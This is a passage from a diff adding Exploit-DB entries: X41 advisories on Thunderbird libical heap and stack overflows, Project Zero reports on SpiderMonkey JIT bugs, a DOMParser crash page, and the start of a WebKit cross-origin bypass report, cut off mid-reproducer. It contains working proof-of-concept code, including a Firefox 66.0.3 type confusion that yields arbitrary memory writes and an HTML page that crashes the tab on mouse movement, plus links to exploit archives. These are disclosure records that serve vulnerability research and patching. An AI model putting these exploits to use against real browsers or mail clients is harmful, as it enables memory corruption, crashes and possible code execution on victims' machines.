+security experts enables X41 to perform premium security services.
+Fields of expertise in the area of application security are security
+centered code reviews, binary reverse engineering and vulnerability
+discovery.
+
+Custom research and a IT security consulting and support services are
+core competencies of X41.
+-----BEGIN PGP SIGNATURE-----
+
+iQIzBAEBCAAdFiEEpwxVTgxAIcUvTugIo5Klpg50CxAFAl0CtO0ACgkQo5Klpg50
+CxCkuA/+L513gnHCf0hOFGuFsGaEX6dPSmJi1g2Wom28cXJw7dEd6/qU4k5H64cI
+yRDQR7vVt7+xUTlPIh8sguaPjB7xOlw+3pHpLo5+pfIuUuK/gK4Wm8ZF1Qv4okBs
+e046d2Nd+UAX/WbEXLt4UHOowgVEJWHfq54WkKHNTseWpeww/sBNdv1qlliiUCWa
+qnFMzA7rbgtOJl/LxS9xDOp5PufD3inR/Apvh49P8IhDj6L7+02fxGt0WdwA/8vF
+TiI2V4bHEYrLmsUptSHSj10HKfMlEqKgWWQCunTGvUZvWWYHS6cS6a9EbHuWWyNY
+8BNj045D0Gw0xL1697erebeIxOZ33+QdEp1NopVzpJkeZBZtx/XYPY3PnQ+HMRjr
+4LwsjdDBeaMVgiUIZ2EZ08779MBYPNB+6p0byaWgyTbyHk0GRVxqRNwkU/8xS0f4
+M9NUt75T7FjqU8VX/KyZsmXs+/8tauh0T3J9CYoQ73r/WoRxB0xeJCEJueRegctu
+gSnIf+KApkmE+2WRc8CrPSZx42XhTjcoEgbcYSxGebEitd+bGz2j2gjwqxDGC8nr
+QK30hr/lOaC0y6nblfCygx+G6hZH1dc2+fi6ZboWZRqRTtB2zIM+SulMj+QjtHCm
+UMPFQeB8stxBfIAxLu8DojBq4YWP8N2wQ5MyAW3/TzTd+JO1Wbk=
+=Hy9J
+-----END PGP SIGNATURE-----
+
+
+Proof of Concept:
+https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/47001.zip
\ No newline at end of file
diff --git a/exploits/multiple/dos/47002.txt b/exploits/multiple/dos/47002.txt
new file mode 100644
index 000000000..b25e5147d
--- /dev/null
+++ b/exploits/multiple/dos/47002.txt
@@ -0,0 +1,101 @@
+X41 D-Sec GmbH Security Advisory: X41-2019-001
+
+Heap-based buffer overflow in Thunderbird
+=========================================
+Severity Rating: High
+Confirmed Affected Versions: All versions affected
+Confirmed Patched Versions: Thunderbird ESR 60.7.XXX
+Vendor: Thunderbird
+Vendor URL: https://www.thunderbird.net/
+Vendor Reference: https://bugzilla.mozilla.org/show_bug.cgi?id=1553814
+Vector: Incoming mail with calendar attachment
+Credit: X41 D-SEC GmbH, Luis Merino
+Status: Public 
+CVE: CVE-2019-11704
+CWE: 122
+CVSS Score: 7.8
+CVSS Vector: CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H/E:U/RL:O
+Advisory-URL: https://www.x41-dsec.de/lab/advisories/x41-2019-001-thunderbird
+
+Summary and Impact
+==================
+A heap-based buffer overflow has been identified in the Thunderbird email
+client. The issue is present in the libical implementation, which was forked
+from upstream libical version 0.47.
+The issue can be triggered remotely, when an attacker sends an specially
+crafted calendar attachment and does not require user interaction. It
+might be used by a remote attacker to crash or gain remote code execution
+in the client system.
+This issue was initially reported by Brandon Perry here:
+https://bugzilla.mozilla.org/show_bug.cgi?id=1280832
+and fixed in libical upstream, but was never fixed in Thunderbird.
+X41 did not perform a full test or audit on the software.
+
+Product Description
+===================
+Thunderbird is a free and open source email, newsfeed, chat, and calendaring
+client, that's easy to set up and customize.
+
+Analysis
+========
+A heap-based buffer overflow in icalvalue.c icalmemory_strdup_and_dequote()
+can be triggered while parsing a calendar attachment containing a malformed
+or specially crafted string. 
+{% highlight c %}
+static char *icalmemorystrdupanddequote(const char *str)
+{
+    char *out = (char *)malloc(sizeof(char) * strlen(str) + 1);
+    char *pout = out;
+    // ...
+    for (p = str; *p!=0; p++){
+        if( *p == '\')
+        {
+            p++;
+        // ...
+        else 
+    {
+            *pout = *p;
+    }
+    }
+{% endhighlight %}
+Bounds checking in `icalmemorystrdupanddequote()can be bypassed when the
+inputp` ends with a backslash, which enables an attacker to read out of bounds
+of the input buffer and writing out of bounds of a heap-allocated output buffer.
+The issue manifests in several ways, including out of bounds read and write,
+null-pointer dereference and frequently leads to heap corruption.
+It is expected that an attacker can exploit this vulnerability to achieve
+remote code execution.
+
+Proof of Concept
+================
+A reproducer eml file can be found in https://github.com/x41sec/advisories/tree/master/X41-2019-001
+
+Workarounds
+===========
+A fix is available from upstream. Alternatively, libical can be replaced by icaljs,
+a JavaScript implementation of ical parsing, by setting 
+calendar.icaljs = true in Thunderbird configuration. 
+
+Timeline
+========
+2016-06-19 Issue reported by Brandon Perry to the vendor
+2019-05-23 Issue reported by X41 D-SEC to the vendor
+2019-05-23 Vendor reply
+2019-06-12 CVE IDs assigned
+2019-06-13 Patched Version released
+2019-06-13 Advisory released
+
+About X41 D-SEC GmbH
+====================
+X41 is an expert provider for application security services.
+Having extensive industry experience and expertise in the area of information
+security, a strong core security team of world class security experts enables
+X41 to perform premium security services.
+Fields of expertise in the area of application security are security centered
+code reviews, binary reverse engineering and vulnerability discovery.
+Custom research and a IT security consulting and support services are core
+competencies of X41.
+
+
+Proof of Concept:
+https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/47002.zip
\ No newline at end of file
diff --git a/exploits/multiple/dos/47003.txt b/exploits/multiple/dos/47003.txt
new file mode 100644
index 000000000..5c92ee156
--- /dev/null
+++ b/exploits/multiple/dos/47003.txt
@@ -0,0 +1,81 @@
+X41 D-Sec GmbH Security Advisory: X41-2019-002
+
+Heap-based buffer overflow in Thunderbird
+=========================================
+Severity Rating: High
+Confirmed Affected Versions: All versions affected
+Confirmed Patched Versions: Thunderbird ESR 60.7.XXX
+Vendor: Thunderbird
+Vendor URL: https://www.thunderbird.net/
+Vendor Reference: https://bugzilla.mozilla.org/show_bug.cgi?id=1553820
+Vector: Incoming mail with calendar attachment
+Credit: X41 D-SEC GmbH, Luis Merino
+Status: Public
+CVE: CVE-2019-11703
+CWE: 122
+CVSS Score: 7.8
+CVSS Vector: CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H/E:U/RL:O
+Advisory-URL: https://www.x41-dsec.de/lab/advisories/x41-2019-002-thunderbird
+
+Summary and Impact
+==================
+A heap-based buffer overflow has been identified in the Thunderbird email
+client. The issue is present in the libical implementation, which was forked
+from upstream libical version 0.47.
+The issue can be triggered remotely, when an attacker sends an specially
+crafted calendar attachment and does not require user interaction. It
+might be used by a remote attacker to crash or gain remote code execution
+in the client system.
+This issue was initially reported by Brandon Perry here:
+https://bugzilla.mozilla.org/show_bug.cgi?id=1281041
+and fixed in libical upstream, but was never fixed in Thunderbird.
+X41 did not perform a full test or audit on the software.
+
+Product Description
+===================
+Thunderbird is a free and open source email, newsfeed, chat, and calendaring
+client, that's easy to set up and customize.
+
+Analysis
+========
+A heap-based buffer overflow in icalparser.c parser_get_next_char()
+can be triggered while parsing a calendar attachment containing a malformed
+or specially crafted string.
+The issue initially manifests with out of bounds read, but we don't discard
+it could later lead to out of bounds write.
+It is expected that an attacker can exploit this vulnerability to achieve
+remote code execution.
+
+Proof of Concept
+================
+A reproducer ical file can be found in https://github.com/x41sec/advisories/tree/master/X41-2019-002
+
+Workarounds
+===========
+A fix is available from upstream. Alternatively, libical can be replaced by icaljs,
+a JavaScript implementation of ical parsing, by setting 
+calendar.icaljs = true in Thunderbird configuration. 
+
+Timeline
+========
+2016-06-20 Issue reported by Brandon Perry to the vendor
+2019-05-23 Issues reported to the vendor
+2019-05-23 Vendor reply
+2019-06-12 CVE IDs assigned
+2019-06-13 Patched Version released
+2019-06-13 Advisory released
+
+About X41 D-SEC GmbH
+====================
+X41 is an expert provider for application security services.
+Having extensive industry experience and expertise in the area of information
+security, a strong core security team of world class security experts enables
+X41 to perform premium security services.
+Fields of expertise in the area of application security are security centered
+code reviews, binary reverse engineering and vulnerability discovery.
+Custom research and a IT security consulting and support services are core
+competencies of X41.
+
+
+Proof of Concept:
+https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/47003.zip
\ No newline at end of file
diff --git a/exploits/multiple/dos/47004.txt b/exploits/multiple/dos/47004.txt
new file mode 100644
index 000000000..d383887d9
--- /dev/null
+++ b/exploits/multiple/dos/47004.txt
@@ -0,0 +1,93 @@
+X41 D-Sec GmbH Security Advisory: X41-2019-003
+
+Stack-based buffer overflow in Thunderbird
+==========================================
+Severity Rating: High
+Confirmed Affected Versions: All versions affected
+Confirmed Patched Versions: Thunderbird ESR 60.7.XXX
+Vendor: Thunderbird
+Vendor URL: https://www.thunderbird.net/
+Vendor Reference: https://bugzilla.mozilla.org/show_bug.cgi?id=1553808
+Vector: Incoming mail with calendar attachment
+Credit: X41 D-SEC GmbH, Luis Merino
+Status: Public
+CVE: CVE-2019-11705
+CWE: 121
+CVSS Score: 7.8
+CVSS Vector: CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H/E:U/RL:O
+Advisory-URL: https://www.x41-dsec.de/lab/advisories/x41-2019-003-thunderbird
+
+Summary and Impact
+==================
+A stack-based buffer overflow has been identified in the Thunderbird email
+client. The issue is present in the libical implementation, which was forked
+from upstream libical version 0.47.
+The issue can be triggered remotely, when an attacker sends an specially
+crafted calendar attachment and does not require user interaction. It
+might be used by a remote attacker to crash or gain remote code execution
+in the client system.
+X41 did not perform a full test or audit on the software.
+
+Product Description
+===================
+Thunderbird is a free and open source email, newsfeed, chat, and calendaring
+client, that's easy to set up and customize.
+
+Analysis
+========
+A stack-based buffer overflow in icalrecur.c icalrecur_add_bydayrules()
+can be triggered while parsing a calendar attachment containing a malformed
+or specially crafted string.
+{% highlight c %}
+static int icalrecuraddbydayrules(struct icalrecurparser *parser,
+                                    const char *vals)
+{
+    short *array = parser->rt.byday;
+    // ...
+    while (n != 0) {
+    // ...
+        if (wd != ICALNOWEEKDAY) {
+            array[i++] = (short) (sign * (wd + 8 * weekno));
+            array[i] = ICALRECURRENCEARRAYMAX;
+    }
+}
+{% endhighlight %}
+Missing sanity checks in `icalrecuradd_bydayrules()can lead to
+out of bounds write in aarraywhenweekno` takes an invalid value.
+The issue manifests as an out-of-bounds write in a stack allocated
+buffer overflow.
+It is expected that an attacker can exploit this vulnerability to achieve
+remote code execution when proper stack smashing mitigations are missing.
+
+Proof of Concept
+================
+A reproducer eml file can be found in https://github.com/x41sec/advisories/tree/master/X41-2019-003
+
+Workarounds
+===========
+A fix is available from upstream. Alternatively, libical can be replaced by icaljs,
+a JavaScript implementation of ical parsing, by setting 
+calendar.icaljs = true in Thunderbird configuration. 
+
+Timeline
+========
+2019-05-23 Issues reported to the vendor
+2019-05-23 Vendor reply
+2019-06-12 CVE IDs assigned
+2019-06-13 Patched Version released
+2019-06-13 Advisory released
+
+About X41 D-SEC GmbH
+====================
+X41 is an expert provider for application security services.
+Having extensive industry experience and expertise in the area of information
+security, a strong core security team of world class security experts enables
+X41 to perform premium security services.
+Fields of expertise in the area of application security are security centered
+code reviews, binary reverse engineering and vulnerability discovery.
+Custom research and a IT security consulting and support services are core
+competencies of X41.
+
+
+Proof of Concept:
+https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/47004.zip
\ No newline at end of file
diff --git a/exploits/multiple/dos/47038.txt b/exploits/multiple/dos/47038.txt
new file mode 100644
index 000000000..190155818
--- /dev/null
+++ b/exploits/multiple/dos/47038.txt
@@ -0,0 +1,157 @@
+The following program (found through fuzzing and manually modified) crashes Spidermonkey built from the current beta channel and Firefox 66.0.3 (current stable):
+
+    // Run with --no-threads for increased reliability
+    const v4 = [{a: 0}, {a: 1}, {a: 2}, {a: 3}, {a: 4}];
+    function v7(v8,v9) {
+        if (v4.length == 0) {
+            v4[3] = {a: 5};
+        }
+
+        // pop the last value. IonMonkey will, based on inferred types, conclude that the result
+        // will always be an object, which is untrue when  p[0] is fetched here.
+        const v11 = v4.pop();
+
+        // Then if will crash here when dereferencing a controlled double value as pointer.
+        v11.a;
+
+        // Force JIT compilation.
+        for (let v15 = 0; v15 < 10000; v15++) {}
+    }
+
+    var p = {};
+    p.__proto__ = [{a: 0}, {a: 1}, {a: 2}];
+    p[0] = -1.8629373288622089e-06;
+    v4.__proto__ = p;
+
+    for (let v31 = 0; v31 < 1000; v31++) {
+        v7();
+    }
+
+When run, it produces a crash similar to the following:
+
+    * thread #1, queue = 'com.apple.main-thread', stop reason = EXC_BAD_ACCESS (code=EXC_I386_GPFLT)
+        frame #0: 0x000025a3b99b26cb
+    ->  0x25a3b99b26cb: cmp    qword ptr [rax], r11
+        0x25a3b99b26ce: jne    0x25a3b99b26dd
+        0x25a3b99b26d4: cmovne rax, rcx
+        0x25a3b99b26d8: jmp    0x25a3b99b26f4
+    Target 0: (js) stopped.
+    (lldb) reg read rax
+         rax = 0x4141414141414141
+
+I haven't thoroughly analyzed bug, but here is roughly what appears to be happening:
+
+* when v4 is created, it will have inferred types for its elements, indicating that they will be JSObjects (this can be seen by running the spidermonkey shell with `INFERFLAGS=full` in the environment)
+* in the block following the function definition, v4's prototype is changed to a new object with a double as element 0. This does not change the inferred element types of v4, presumably because these only track own properties/elements and not from prototypes
+* v7 is executed a few times and all original elements from v4 are popped
+* the element assignment (`v4[3] = ...`) changes the length of the array (to 4) without changing the inferred element types
+
+Afterwards, v7 is (re-)compiled by IonMonkey:
+* the call to v4.pop() is inlined by IonMonkey and converted to an MArrayPopShift instruction [1]
+* since the inferred element types (JSObjects) match the observed types, no type barrier is emitted [2, 3]
+* IonMonkey now assumes that the result of v4.pop() will be an object, thus omits type checks and directly proceed with the property load
+* Later, when generating machine code for v4.pop [4], IonMonkey generates a call to the runtime function ArrayPopDense [5]
+
+At execution time of the JITed code, when v4.length is back at 1 (and so the only element left to pop is element 0), the following happens:
+* The runtime call to ArrayPopDense is taken
+* this calls js::array_pop which in turn proceeds to load p[0] as v4 doesn't have a property with name '0'
+* the array pop operation thus returns a double value
+
+However, the JITed code still assumes that it received a JSObject* from the array pop operation and goes on to dereference the value, leading to a crash at an attacker controlled address. It is likely possible to exploit this bug further as type inference issues are generally well exploitable.
+
+To summarize, the problem seems to be that the code handling Array.pop in IonMonkey doesn't take into account that Array.prototype.pop can load an element from the prototype, which could conflict with the array's inferred element types.
+
+
+Bugzilla entry: https://bugzilla.mozilla.org/show_bug.cgi?id=1544386
+
+
+Below is the original sample triggered by my fuzzer:
+
+    // Run with -no-threads --cpu-count=1 --ion-offthread-compile=off --baseline-warmup-threshold=10 --ion-warmup-threshold=100
+    let v2 = 0;
+    v2 = 7;
+    const v4 = [13.37,13.37,13.37,13.37,13.37];
+    function v7(v8,v9) {
+        const v10 = v2 + v4;
+        v4[v10] = Object;
+        const v11 = v4.pop();
+        for (let v15 = 0; v15 < 100; v15++) {
+        }
+    }
+    v4.__proto__ = Object;
+    for (let v19 = 0; v19 < 100; v19++) {
+        const v23 = [-1000000000000.0,-1000000000000.0,-1000000000000.0];
+        let v24 = Object;
+        v24.__proto__ = v23;
+        const v26 = String.fromCharCode(v19);
+        Object[0] = v26;
+    }
+    for (let v31 = 0; v31 < 100; v31++) {
+        const v32 = v7();
+    }
+
+
+This bug can be exploited in a very similar way to https://bugs.chromium.org/p/project-zero/issues/detail?id=1791 and https://bugs.chromium.org/p/project-zero/issues/detail?id=1810 as they all allow the construction of type confusions between arbitrary objects. The following modification of the PoC achieves fast and reliable memory writes to arbitrary addresses in FireFox 66.0.3:
+
+    // Run with --no-threads for increased reliability
+    let ab = new ArrayBuffer(0x1000);
+
+    // Confuse these two types with each other below.
+    let x = {buffer: ab, length: 13.39, byteOffset: 13.40, data: 3.54484805889626e-310};
+    let y = new Uint32Array(0x1000);
+
+    const v4 = [y, y, y, y, y];
+    function v7(v8,v9) {
+        if (v4.length == 0) {
+            v4[3] = y;
+        }
+
+        // pop the last value. IonMonkey will, based on inferred types, conclude that the result
+        // will always be an object, which is untrue when p[0] is fetched here.
+        const v11 = v4.pop();
+
+        // It will then crash here when writing to a controlled address (0x414141414141).
+        v11[0] = 0x1337;
+
+        // Force JIT compilation.
+        for (let v15 = 0; v15 < 10000; v15++) {}
+    }
+
+    var p = {};
+    p.__proto__ = [y, y, y];
+    p[0] = x;
+    v4.__proto__ = p;
+
+    for (let v31 = 0; v31 < 1000; v31++) {
+        v7();
+    }
+
+
+    /* Crashes as follows in Firefox 66.0.3:
+
+    (lldb) process attach --pid 12534
+    ...
+
+    Executable module set to "/Applications/Firefox.app/Contents/MacOS/plugin-container.app/Contents/MacOS/plugin-container".
+    (lldb) c
+    Process 12534 resuming
+    Process 12534 stopped
+    * thread #1, queue = 'com.apple.main-thread', stop reason = EXC_BAD_ACCESS (code=1, address=0x414141414141)
+        frame #0: 0x000037f56ae479bd
+    ->  0x37f56ae479bd: mov    dword ptr [rcx + 4*rax], 0x1337
+    Target 0: (plugin-container) stopped.
+    (lldb) reg read rcx rax
+         rcx = 0x0000414141414141
+         rax = 0x0000000000000000
+    */
+
+
+The issue was fixed with commit https://hg.mozilla.org/releases/mozilla-beta/rev/109cefe117fbdd1764097e06796960082f4fee4e and released as an out-of-band security update on Jun 18th: https://www.mozilla.org/en-US/security/advisories/mfsa2019-18/
+
+
+I looks like the core issue here was that IonMonkey, when trying to inline calls to Array.push and Array.pop into e.g. the MArrayPopShift instruction, didn't correctly verify that those operations would not end up accessing the prototype. It e.g. checked that no indexed properties (elements) exist on Array.prototype but this check could be bypassed by introducing an intermediate prototype such that the prototype chain looks something like array -> custom prototype with elements -> Array.prototype -> Object.prototype -> null. This is then problematic for at least two reasons:
+
+* There could be inferred element types for the array. IonMonkey then assumed that the inlined pop would always yield an object of the inferred type which wasn't true if the pop actually loaded an element from the prototype. This is the aspect that Fuzzilli triggered
+* By installing indexed getters and/or setter on the prototype, it becomes possible to turn this bug into an unexpected side-effect issue as the inlined push and pop operations are not supposed to trigger any side-effects
+
+The fix was then to avoid inlining push and pop if the access could potentially go to the prototype.
\ No newline at end of file
diff --git a/exploits/multiple/dos/47079.html b/exploits/multiple/dos/47079.html
new file mode 100644
index 000000000..57d0954af
--- /dev/null
+++ b/exploits/multiple/dos/47079.html
@@ -0,0 +1,52 @@
+<!--
+  Exploit Title: DOMParser Denial of Service on Firefox 67.0.4 
+
+  Date: 09/07/2019
+
+  Description: pass a huge string as an argument to DOMParser.parseFromString will crash the tab in Firefox version 67.0.4.
+
+  Exploit Author:Tejas Ajay Naik  
+
+  Vendor Homepage: 
+
+  Software Link: https://ftp.mozilla.org/pub/firefox/releases/
+
+  Version: 67.0.4
+
+  Tested On: Linux x86,Windows x64 1803  
+
+  CVE:
+-->
+<!DOCTYPE html>
+<head>
+  <title>
+    Loading please wait
+  </title>
+  
+  <script>
+    function MyFun() {
+    
+    var text = [];
+    for(var i=0 ;i<300 ; ++i)
+      text += "<\x70><\x70><\x70><\x70><\x70><\x70><\x70><\x70><\x70><\x70><\x70><\x70><\x70><\x70><\x70><\x70><\x70><\x70><\x70><\x70>"+
+              "<\x70><\x70><\x70><\x70><\x70><\x70><\x70><\x70><\x70><\x70><\x70><\x70><\x70><\x70><\x70><\x70><\x70><\x70><\x70><\x70>"+
+              "<\x70><\x70><\x70><\x70><\x70><\x70><\x70><\x70><\x70><\x70><\x70><\x70><\x70><\x70><\x70><\x70><\x70><\x70><\x70><\x70>"+
+              "<\x70><\x70><\x70><\x70><\x70><\x70><\x70><\x70><\x70><\x70><\x70><\x70><\x70><\x70><\x70><\x70><\x70><\x70><\x70><\x70>"+
+              "<\x70><\x70><\x70><\x70><\x70><\x70><\x70><\x70><\x70><\x70><\x70><\x70><\x70><\x70><\x70><\x70><\x70><\x70><\x70><\x70>"+
+              "<\x70><\x70><\x70><\x70><\x70><\x70><\x70><\x70><\x70><\x70><\x70><\x70><\x70><\x70><\x70><\x70><\x70><\x70><\x70><\x70>"+
+              "<\x70><\x70><\x70><\x70><\x70><\x70><\x70><\x70><\x70><\x70><\x70><\x70><\x70><\x70><\x70><\x70><\x70><\x70><\x70><\x70>"+
+              "<\x70><\x70><\x70><\x70><\x70><\x70><\x70><\x70><\x70><\x70><\x70><\x70><\x70><\x70><\x70><\x70><\x70><\x70><\x70><\x70>"+
+              "<\x70><\x70><\x70><\x70><\x70><\x70><\x70><\x70><\x70><\x70><\x70><\x70><\x70><\x70><\x70><\x70><\x70><\x70><\x70><\x70>"+
+              "<\x70><\x70><\x70><\x70><\x70><\x70><\x70><\x70><\x70><\x70><\x70><\x70><\x70><\x70><\x70><\x70><\x70><\x70><\x70><\x70>";
+      var domparser = new DOMParser();
+      var doc = domparser.parseFromString(text,"application/xhtml+xml");
+  }
+  </script>
+
+</head>
+
+<body>
+  <input type="button" onmousemove="MyFun()" value="click"/>
+  <p id="demo"></p>
+</body>  
+</html>
\ No newline at end of file
diff --git a/exploits/multiple/dos/47085.js b/exploits/multiple/dos/47085.js
new file mode 100644
index 000000000..631c542cb
--- /dev/null
+++ b/exploits/multiple/dos/47085.js
@@ -0,0 +1,82 @@
+/*
+For constructors, Spidermonkey implements a "definite property analysis" [1] to compute which properties will definitely exist on the constructed objects. Spidermonkey then directly allocates the constructed objects with the final Shape. As such, at the entrypoint of the constructor the constructed objects will already "look like" they have all the properties that are only installed throughout the constructor. This mechanism e.g. makes it possible to omit some Shape updates in JITed code. See also https://bugs.chromium.org/p/project-zero/issues/detail?id=1791 for another short explanation of this mechanism.
+
+The definite property analysis must ensure that "predefining" the properties in such a way will not be visible to the running script. In particular, it can only mark properties as definite if they aren't read or otherwise accessed before the assignment.
+
+In the following JavaScript program, discovered through fuzzing and then manually modified, Spidermonkey appears to incorrectly handle such a scenario:
+*/
+
+    l = undefined;
+
+    function v10() {
+        let v15 = 0;
+        try {
+            const v16 = v15.foobar();
+        } catch(v17) {
+            l = this.uninitialized;
+        }
+        this.uninitialized = 1337;
+    }
+
+    for (let v36 = 0; v36 < 100; v36++) {
+        const v38 = new v10();
+        if (l !== undefined) {
+            console.log("Success: 0x" + l.toString(16));
+            break;
+        }
+    }
+
+/*
+When run on a local Spidermonkey built from the beta branch or in Firefox 66.0.3 with `javascript.options.unboxed_objects` set to true in about:config, it will eventually output something like:
+
+	Success: 0x2d2d2d2d
+
+Here, the definite property analysis concluded that .uninitialized is definitely assigned to the constructed objects and not accessed before it is assigned (which is wrong). In particular, it seems that the catch block is entirely ignored by the analysis as it is not present in the Ion graph representation of v10 on which the analysis is performed. As such, when reading .uninitialized in the catch block, uninitialized memory (which seems to be initialized with 0x2d in debug builds) is read from `this` and later printed to stdout. If the line `this.uninitialized = 1337;` is modified to instead assign a double value (e.g. `this.uninitialized = 13.37;`), then an assertion failure can be observed:
+
+    Assertion failure: isDouble(), at js/src/build_DBG.OBJ/dist/include/js/Value.h:450
+
+As unboxed properties can also store JSObject pointers, this bug can likely be turned into memory corruption as well. However, since this requires unboxed object, which have recently been disabled by default and appear to be fully removed soon, it likely only affects non-standard configurations of FireFox. If unboxed objects are disabled (e.g. through --no-unboxed-objects), then the analysis will still be incorrect and determine that .uninitialized can be "predefined". This can be observed by changing `l = this.uninitialized;` to `l = this.hasOwnProperty('uninitialized');` which will incorrectly return true. In that case, the property slots seem to be initialized with `undefined` though, so no memory safety violation occurs. However, I have not verified that they will always be initialized in that way. Furthermore, it might be possible to confuse property type inference in that case, but I have not attempted that.
+
+
+Below is the original sample triggered by fuzzilli. It ended up reading the property by spreading |this|.
+
+    // Run with --no-threads --ion-warmup-threshold=100
+    function main() {
+    const v3 = Object != Object;
+    let v4 = v3;
+    const v5 = typeof undefined;
+    const v7 = v5 === "undefined";
+    const v9 = Array();
+    function v10(v11,v12) {
+        let v15 = 0;
+        try {
+            const v16 = v15.race();
+        } catch(v17) {
+            for (let v21 = 0; v21 < 7; v21++) {
+                let v24 = 0;
+                while (v24 < 256) {
+                    const v25 = v24 + 1;
+                    v24 = v25;
+                }
+                const v26 = Array == v21;
+                const v27 = {trimStart:v4,seal:v10,...v26,...v9,...v26,...v26,...this,...v7};
+            }
+        }
+        for (let v30 = 0; v30 < 9; v30++) {
+        }
+        const v31 = v4 + 1;
+        this.E = v31;
+    }
+    const v32 = v10();
+    for (let v36 = 0; v36 < 5; v36++) {
+        const v38 = new v10();
+        let v39 = Object;
+        const v41 = Object();
+        const v42 = v41.getOwnPropertyDescriptors;
+        let v43 = v42;
+        const v44 = {LN10:v42,unshift:Object,isFinite:Object,test:v41,...v43,...v39,...v41};
+    }
+    }
+    main();
+    gc();
+*/
\ No newline at end of file
diff --git a/exploits/multiple/dos/47162.txt b/exploits/multiple/dos/47162.txt
new file mode 100644
index 000000000..b6968ef9b
--- /dev/null
+++ b/exploits/multiple/dos/47162.txt
@@ -0,0 +1,240 @@
+BACKGROUND
+As lokihardt@ has demonstrated in https://bugs.chromium.org/p/project-zero/issues/detail?id=1121,
+WebKit's support of the obsolete `showModalDialog` method gives an attacker the ability to perform
+synchronous cross-origin page loads. In certain conditions, this might lead to
+time-of-check-time-of-use bugs in the code responsible for enforcing the Same-Origin Policy. In
+particular, the original bug exploited a TOCTOU bug in `SubframeLoader::requestFrame` to achieve
+UXSS.
+
+(copied from lokihardt's report)
+```
+bool SubframeLoader::requestFrame(HTMLFrameOwnerElement& ownerElement, const String& urlString, const AtomicString& frameName, LockHistory lockHistory, LockBackForwardList lockBackForwardList)
+{
+    // Support for <frame src="javascript:string">
+    URL scriptURL;
+    URL url;
+    if (protocolIsJavaScript(urlString)) {
+        scriptURL = completeURL(urlString); // completeURL() encodes the URL.
+        url = blankURL();
+    } else
+        url = completeURL(urlString);
+
+    if (shouldConvertInvalidURLsToBlank() && !url.isValid())
+        url = blankURL();
+
+    Frame* frame = loadOrRedirectSubframe(ownerElement, url, frameName, lockHistory, lockBackForwardList); <<------- in here, the synchronous page load is made.
+    if (!frame)
+        return false;
+
+    if (!scriptURL.isEmpty())
+        frame->script().executeIfJavaScriptURL(scriptURL); <<----- boooom
+
+    return true;
+}
+```
+
+The bug was fixed by inserting an extra access check right in front of the `executeIfJavaScriptURL`
+call.
+```
+-    if (!scriptURL.isEmpty())
++    if (!scriptURL.isEmpty() && ownerElement.isURLAllowed(scriptURL))
+         frame->script().executeIfJavaScriptURL(scriptURL);
+```
+
+It has stopped the original attack, but a year later https://bugs.webkit.org/show_bug.cgi?id=187203
+was reported, which abused the HTML parser to bypass the added check. The problem was that
+`isURLAllowed` didn't block `javascript:` URIs when the JavaScript execution context stack was
+empty, i.e. when the `requestFrame` call was originating from the parser, so the exploit just needed
+to make the parser insert an `iframe` element with a `javascript:` URI and use its `onload` handler
+to load a cross-origin page inside `loadOrRedirectSubframe`.
+
+As a result, another check has been added (see the comment below):
+```
++    bool hasExistingFrame = ownerElement.contentFrame();
+     Frame* frame = loadOrRedirectSubframe(ownerElement, url, frameName, lockHistory, lockBackForwardList);
+     if (!frame)
+         return false;
+ 
+-    if (!scriptURL.isEmpty() && ownerElement.isURLAllowed(scriptURL))
++    // If we create a new subframe then an empty document is loaded into it synchronously and may
++    // cause script execution (say, via a DOM load event handler) that can do anything, including
++    // navigating the subframe. We only want to evaluate scriptURL if the frame has not been navigated.
++    bool canExecuteScript = hasExistingFrame || (frame->loader().documentLoader() && frame->loader().documentLoader()->originalURL() == blankURL());
++    if (!scriptURL.isEmpty() && canExecuteScript && ownerElement.isURLAllowed(scriptURL))
+         frame->script().executeIfJavaScriptURL(scriptURL);
+```
+
+VULNERABILITY DETAILS
+The second fix relies on the assumption that the parser can't trigger a `requestFrame` call for an
+`iframe` element with an existing content frame. However, due to the way the node insertion
+algorithm is implemented, it's possible to run JavaScript while the element's insertion is still in
+progress:
+
+https://trac.webkit.org/browser/webkit/trunk/Source/WebCore/dom/ContainerNode.cpp#L185
+```
+static ALWAYS_INLINE void executeNodeInsertionWithScriptAssertion(ContainerNode& containerNode, Node& child,
+    ContainerNode::ChildChangeSource source, ReplacedAllChildren replacedAllChildren, DOMInsertionWork doNodeInsertion)
+{
+    NodeVector postInsertionNotificationTargets;
+    {
+        ScriptDisallowedScope::InMainThread scriptDisallowedScope;
+
+        if (UNLIKELY(containerNode.isShadowRoot() || containerNode.isInShadowTree()))
+            containerNode.containingShadowRoot()->resolveSlotsBeforeNodeInsertionOrRemoval();
+
+        doNodeInsertion();
+        ChildListMutationScope(containerNode).childAdded(child);
+        postInsertionNotificationTargets = notifyChildNodeInserted(containerNode, child);
+    }
+
+[...]
+
+    ASSERT(ScriptDisallowedScope::InMainThread::isEventDispatchAllowedInSubtree(child));
+    for (auto& target : postInsertionNotificationTargets)
+        target->didFinishInsertingNode();
+[...]
+```
+
+Note that `HTMLFrameElementBase::didFinishInsertingNode` eventually calls `requestFrame`. So, if a
+subtree which is being inserted contains multiple `iframe` elements, the first one can act as a
+trigger for the JavaScript code that creates a content frame for another element right before its
+`requestFrame` method is executed to bypass the `canExecuteScript` check. `isURLAllowed` again can
+be tricked with the help of the HTML parser.
+
+It's also worth noting that the `showModalDialog` method has to be triggered by a user gesture. On
+the other hand, an attacker can't just wrap the exploit in a `click` event handler, as it would put
+an execution context on the stack and make the `isURLAllowed` check fail. One way to overcome this
+is to save a gesture token by performing an asynchronous load of a `javascript:` URI.
+
+VERSION
+Safari 12.0.3 (14606.4.5)
+WebKit r243998
+
+REPRODUCTION CASE
+<body>
+<h1>Click anywhere</h1>
+<script>
+let counter = 0;
+function run() {
+  if (++counter == 2) {
+    parent_frame = frame.contentDocument.querySelector("iframe");
+    frame1 = parent_frame.appendChild(document.createElement("iframe"));
+    frame2 = parent_frame.appendChild(document.createElement("iframe"));
+    frame1.src = "javascript:top.runChild()";
+  }
+}
+
+let child_counter = 0;
+function runChild() {
+  if (++child_counter == 2) {
